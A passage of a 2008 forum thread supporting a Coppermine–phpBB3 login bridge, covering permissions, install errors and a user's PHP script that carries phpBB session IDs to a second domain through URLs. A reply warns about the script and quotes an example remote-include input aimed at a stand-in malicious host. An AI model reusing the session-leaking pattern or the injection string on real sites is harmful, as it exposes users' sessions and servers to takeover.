Page 12 of 24

Re: [BETA] Bridge Coppermine <-> phpBB3, v0.9.0

Posted: Mon Mar 03, 2008 10:56 pm
by Nielk1
The most important thing to do is to set the admin group to be able to administrate the Coppermine, which is in the normal instructions.

Then you just log into the bridged gallery, go to admin mode, click on groups, and ignore the groups labeled CPG Admin, CPG Registered Users, CPG Guests, and CPG Bots. All the other groups are those from your forum. If you want all registered users to be able to have personal galleries, set Personal gallery permissions to Allowed: Yes. If you do not want to have to approve every image they upload set Approval: No.

You can also set if they have the ability to upload to public albums, though the albums themselves must have 'Visitors Can Upload' set to Yes and be a member of the group that can see the album. If you install the mod I listed earlier, the upload-er must be a member of the uploading group instead of just that of the viewing group.

I set most of my galleries to allow anyone to view them, visitor uploads on, and then set the uploading group via the aforementioned mod to whom I want.

Re: [BETA] Bridge Coppermine <-> phpBB3, v0.9.0

Posted: Tue Mar 04, 2008 6:14 pm
by Mike_PL
I have "fatal error" when finish bridge... Why?

Re: [BETA] Bridge Coppermine <-> phpBB3, v0.9.0

Posted: Wed Mar 05, 2008 10:30 pm
by fornit
Hi Mike,

can you please post the details of that fatal error? Is it a MySQL Error or a message coming from Coppermine or from phpBB3?

It's difficult to guess what the problem is, if you only post that you have an error ;)

Regards
fornit

Re: [BETA] Bridge Coppermine <-> phpBB3, v0.9.0

Posted: Thu Mar 06, 2008 6:34 am
by kaeldaven
Just wanted to give a shout out, I performed this mod and just wanted to say it worked flawlessly. Thank you very much for the detailed installation guide, I was able to install this while cooking dinner and helping my daughter with her homework all at the same time, it was that easy.

(Actual installation time, 11 minutes) Thanks Again!

Re: [BETA] Bridge Coppermine <-> phpBB3, v0.9.0

Posted: Mon Mar 10, 2008 1:39 am
by gozer_it
fornit wrote:Well,

the bridge can only work if it gets the cookies from phpBB3. As far as I know this makes it necessary that both are located on the same domain. It is possible to use subdomains but from my understanding it cannot work if you use completely different domains.

But I'm not a cookie specialist. If you find a solution please let me know.

Regards
fornit
My solution :

master -> phpbb domain
slave -> coppermine domain

slave site :

add a file named something as cookie_bridging.php as follows :

<?php
$sid = $_GET['sid'];
if ($sid != '')
{
setcookie('<master_cookie_name>_sid',$sid,time()+7200);
}
else
{
setcookie('<master_cookie_name>_sid','',time()-3600);
}
?>


master site :

edit the styles/<stylename>/template/overall_header.html file as follows :

add wherever you like (i did it at the end of links main bar) the following line :

<img src="http://<slave_domain>/cookie_bridging.php?sid={SESSION_ID}" widht=1 height=1>


Ok, that's all, it sets or unsets corresponding cookie on the slave site whenever i load any master site page.
It works fine for my sites, but it can be refined with parameters, a couple of lines more and it will handle "sid changes" too... what about it? Any security leak?

Re: [BETA] Bridge Coppermine <-> phpBB3, v0.9.0

Posted: Mon Mar 10, 2008 11:49 pm
by kyle1745
Anyone any closer to a prosilver template?

Re: [BETA] Bridge Coppermine <-> phpBB3, v0.9.0

Posted: Tue Mar 11, 2008 1:44 am
by fornit
@gozer_it

It took 5 minutes until I realized what your code will do, but that's really a great idea, I must say. :)

With respect to security - it may be better if you check the SID by a regular expression, i.e. something like
if (!preg_match('/^[a-z0-9]*$/', $sid))
{
// don't do anything
}
else
{
setcookie ...
...
}

That's just to prevent statements like http://<slave_domain>/cookie_bridging.php?sid=include(http://scriptkiddies.com/maliciouscode.php)

Thank you very much

Re: [BETA] Bridge Coppermine <-> phpBB3, v0.9.0

Posted: Tue Mar 11, 2008 5:14 am
by gozer_it
fornit wrote:@gozer_it

It took 5 minutes until I realized what your code will do, but that's really a great idea, I must say. :)

With respect to security - it may be better if you check the SID by a regular expression, i.e. something like
if (!preg_match('/^[a-z0-9]*$/', $sid))
{
// don't do anything
}
else
{
setcookie ...
...
}

That's just to prevent statements like http://<slave_domain>/cookie_bridging.php?sid=include(http://scriptkiddies.com/maliciouscode.php)

Thank you very much
Thanks for your suggestion :)

Re: [BETA] Bridge Coppermine <-> phpBB3, v0.9.0

Posted: Fri Mar 14, 2008 3:33 pm
by Halfhidden
I used this bridge sometime ago when it was first released. The bridge worked flawlessly. I then upgraded my Coppermine from 1.4.14 to 1.4.16 and the bridge continued to work well. The only issue I had was when I installed a mod to create a moderator in Coppermine I couldn't get the groups to populate properly. However I was advised to rerun the bridge and the system worked fine after that. I now have moderators in Coppermine with limited access for editing files and the administrators have there own rights.
What a fantastic mod (bridge)this is.
Thanks

Re: [BETA] Bridge Coppermine <-> phpBB3, v0.9.0

Posted: Fri Mar 14, 2008 7:41 pm
by RickieIzfazt
kyle1745 wrote:Anyone any closer to a prosilver template?
this week ik tried (again) some options but i always get into the same problems, first a make_clickable() conflict with phpBB3 and when that is solved a major crash and it does not find / get into the coppermine database... there is no easy fast quick solution on this it seems, I tried three different, we have to wait for somebody with more time to get deeper into this....will be quit a popular MOD I guess...

Re: [BETA] Bridge Coppermine <-> phpBB3, v0.9.0

Posted: Tue Mar 18, 2008 6:41 pm
by KellyD
I followed all directions and when I got to the end and started logging into coppermine. I received an error.
Parse error: syntax error, unexpected $end in /home/.hobbes/heavens/ghgalleries.heavens-angel.net/gallery/lang/english.php on line 503
Any ideas? I check the file and it relates to post-based....

Re: [BETA] Bridge Coppermine <-> phpBB3, v0.9.0

Posted: Tue Mar 18, 2008 7:54 pm
by Halfhidden
Isn't a parse error basically a syntex error. My guess is that
1 either you had previous changes in the english.php and they had been overwritten when the file was replaced with the copy from phppb3 bridge or 2 the other thing would be that a mistake was made when you copied and pasted the block to the english.php file.
I've used this bridge on 1.4.14 and 1.4.16 but I had to paste the code from the sample english.php file sent with this bridge in the english.php because I had mod in Coppermine and they would have been over written.
Hope this helps? :ugeek:

PS
you only need to copy the text from the sample file marked "Stephen"

Re: [BETA] Bridge Coppermine <-> phpBB3, v0.9.0

Posted: Tue Mar 18, 2008 10:11 pm
by KellyD
Ok it's a brand new installation of coppermine. No modications.

I copied over the english.php from the zip and replaced the one on the server.

I guess that was wrong, so I'm kinda confused about what I'm suppose to do with the Stephen sample text...could you explain further?

Re: [BETA] Bridge Coppermine <-> phpBB3, v0.9.0

Posted: Thu Mar 20, 2008 1:10 am
by Halfhidden
Sorry about the delay... I've been off the net due to local issues.
The Simon bit.... Ok if you have a brand new version then you have 1.4.16? Because this version of the bridge was build wilst verssion 1.4.14 was current it makes sense to copy and paste the information to the existing english.php rather than replace it. In fact I never replace a file before making a backup before hand... you never know.
would you like me to post a copy of the english.php code that is current to Coppermine 1.4.16 and this phppb3 bridge?
That way you can copy this to your english.php and hopefully things will be ok.
To see the bridge at work go to http://www.picturepenzance.co.uk Obviously you'll need to log in to see the whole thing (it free) but this gives you an idea of the bridge.

Regards,
Steff :mrgreen:

Re: [BETA] Bridge Coppermine <-> phpBB3, v0.9.0

Posted: Thu Mar 20, 2008 2:20 pm
by KellyD
Yes Please, I would like to see it.

LOL, I've been still working on my gallery but I haven't made it public until I get this bridge working.